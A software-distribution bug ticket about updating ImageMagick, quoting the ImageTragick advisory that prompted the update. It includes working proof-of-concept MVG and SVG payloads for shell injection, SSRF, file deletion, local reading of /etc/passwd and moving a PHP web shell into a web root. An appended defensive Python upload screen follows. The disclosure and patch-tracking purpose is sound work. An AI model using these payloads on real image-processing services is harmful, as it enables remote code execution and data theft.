Opened 8 years ago

Closed 8 years ago

#7812 closed enhancement (fixed)

ImageMagick-7.0.1-2

Reported by: bdubbs@…
Owned by: bdubbs@…
Priority: high
Milestone: 7.10
Component: BOOK
Version: SVN
Severity: normal
Keywords:
Cc:

Description (last modified by bdubbs@…)

New micro version.

Setting as placeholder because we really do not want to update more than about once a month unless there is a major issue.

Now there is a major issue.

Change History (4)

comment:1 by Douglas R. Reno, 8 years ago

Here's a major issue that I found mentioned on the oss-security mailing list a couple of days ago:

https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588
https://imagetragick.com/

ImageMagick: Multiple vulnerabilities in image decoder

1. CVE-2016-3714 - Insufficient shell characters filtering leads to (potentially remote) code execution

Insufficient filtering for filename passed to delegate's command allows remote code execution during conversion of several file formats.
 
ImageMagick allows files to be processed with external libraries. This feature is called 'delegate'. It is implemented as a system() with command string ('command') from the config file delegates.xml with actual value for different params (input/output filenames etc). Due to insufficient %M param filtering it is possible to conduct shell command injection. One of the default delegates' commands is used to handle https requests:
"wget" -q -O "%o" "https:%M"

where %M is the actual link from the input. It is possible to pass the value like 
`https://example.com";|ls "-la`
and execute unexpected 'ls -la'. (wget or curl should be installed) 
$ convert 'https://example.com";|ls "-la' out.png
total 32
drwxr-xr-x 6 user group 204 Apr 29 23:08 .
drwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..


The most dangerous part is that ImageMagick supports several formats like svg, mvg (thanks to Stewie for his research of this file format and idea of the local file read vulnerability in ImageMagick, see below), maybe some others - which allow external files to be included from any supported protocol including delegates. As a result, any service which uses ImageMagick to process user-supplied images and uses default delegates.xml / policy.xml may be vulnerable to this issue.

exploit.mvg:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";|ls "-la)'
pop graphic-context

exploit.svg:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink=
"http://www.w3.org/1999/xlink">
<image xlink:href="https://example.com/image.jpg&quot;|ls &quot;-la"
x="0" y="0" height="640px" width="480px"/>
</svg>


Example execution:
$ convert exploit.mvg out.png
total 32
drwxr-xr-x 6 user group 204 Apr 29 23:08 .
drwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..


ImageMagick tries to guess the type of the file by its content, so exploitation doesn't depend on the file extension. You can rename exploit.mvg to exploit.jpg or exploit.png to bypass file type checks. In addition, ImageMagick's tool identify is also vulnerable, so it can't be used as a protection to filter file by its content and creates additional attack vectors (e.g. via 'less exploit.jpg', because identify is invoked via lesspipe.sh).

Ubuntu 14.04 and OS X, latest system packages (ImageMagick 6.9.3-7 Q16 x86_64 2016-04-27 and ImageMagick 6.8.6-10 2016-04-29 Q16) and latest sources from 6 and 7 branches all are vulnerable. Ghostscript and wget (or curl) should be installed on the system for successful PoC execution. For svg PoC ImageMagick's svg parser should be used, not rsvg. 
All other issues also rely on the dangerous ImageMagick feature of external files inclusion from any supported protocol in formats like svg and mvg.

2. CVE-2016-3718 - SSRF

It is possible to make HTTP GET or FTP request:
ssrf.mvg:
push graphic-context
viewbox 0 0 640 480
fill 'url(http://example.com/)'
pop graphic-context
The following then makes an http request to example.com:
$ convert ssrf.mvg out.png

3. CVE-2016-3715 - File deletion

It is possible to delete files by using ImageMagick's 'ephemeral' pseudo protocol which deletes files after reading:
delete_file.mvg:
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:/tmp/delete.txt'
pop graphic-context

$ touch /tmp/delete.txt
$ convert delete_file.mvg out.png # deletes /tmp/delete.txt


4. CVE-2016-3716 - File moving

It is possible to move image files to a file with any extension in any folder by using ImageMagick's 'msl' pseudo protocol. msl.txt and image.gif should exist in a known location - /tmp/ for PoC (in real life it may be a web service written in PHP, which allows uploading raw txt files and processes images with ImageMagick):

file_move.mvg:
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'msl:/tmp/msl.txt'
pop graphic-context

/tmp/msl.txt:
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="/tmp/image.gif" />
<write filename="/var/www/shell.php" />
</image>



/tmp/image.gif - image with php shell inside (https://www.secgeek.net/POC/POC.gif for example) 
$ convert file_move.mvg out.png # moves /tmp/image.gif to /var/www/shell.php

5. CVE-2016-3717 - Local file read (independently reported by original research author - Stewie)

It is possible to get content of the files from the server by using ImageMagick's 'label' pseudo protocol: 
file_read.mvg:
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'label:@/etc/passwd'
pop graphic-context

$ convert file_read.mvg out.png

produces file with text rendered from /etc/passwd


Supposedly fixed in 7.0.1-2.

For those wondering where I get my information, I am subscribed to the oss-security mailing list, where all of the CVE Requests end up going.
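Added example (not part of the ticket or the quoted advisory): because ImageMagick picks a decoder from file content rather than extension, an upload pre-screen has to do the same and only pass on files whose leading bytes match an allowed raster format. The function names, the allowlist and the sample file names below are assumptions for illustration; the two MVG bodies are taken from the advisory text.

```python
import re

# Magic bytes of the raster formats a (hypothetical) upload service accepts.
ALLOWED_MAGIC = {
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Pseudo-protocols and URL schemes named in the advisory; reported only to
# explain a rejection. The gate itself is the magic-byte allowlist.
REFERENCE = re.compile(rb"\b(ephemeral|msl|label|url|https?|ftp)\s*[:(]", re.I)


def sniff_format(data):
    """Return the allowed format whose magic bytes start `data`, else None."""
    for name, magics in ALLOWED_MAGIC.items():
        if data.startswith(magics):
            return name
    return None


def screen_upload(filename, data):
    """Decide from content alone; `filename` is kept only for the log record."""
    fmt = sniff_format(data)
    refs = [] if fmt else sorted(
        {m.group(1).lower().decode() for m in REFERENCE.finditer(data[:4096])})
    return {"file": filename, "accept": fmt is not None,
            "format": fmt, "references": refs}


# Constructed samples: two MVG bodies copied from the advisory text above,
# saved under misleading extensions, and the first bytes of a PNG file.
SSRF_MVG = (b"push graphic-context\nviewbox 0 0 640 480\n"
            b"fill 'url(http://example.com/)'\npop graphic-context\n")
DELETE_MVG = (b"push graphic-context\nviewbox 0 0 640 480\n"
              b"image over 0,0 0,0 'ephemeral:/tmp/delete.txt'\n"
              b"pop graphic-context\n")
PNG_HEAD = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"

if __name__ == "__main__":
    for name, body in [("ssrf.jpg", SSRF_MVG), ("delete_file.png", DELETE_MVG),
                       ("photo.dat", PNG_HEAD)]:
        print(screen_upload(name, body))
```

The screen rejects both renamed MVG files and accepts the PNG regardless of its extension; it complements, and does not replace, updating ImageMagick and restricting policy.xml.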

comment:2 by bdubbs@…, 8 years ago

Milestone: hold → 7.10
Owner: changed from blfs-book@… to bdubbs@…
Priority: normal → high
Status: new → assigned

comment:3 by bdubbs@…, 8 years ago

Description: modified (diff)
Summary: ImageMagick-7.0.1-2 (Placeholder) → ImageMagick-7.0.1-2

comment:4 by bdubbs@…, 8 years ago

Resolution: fixed
Status: assigned → closed

Fixed at revision 17344.
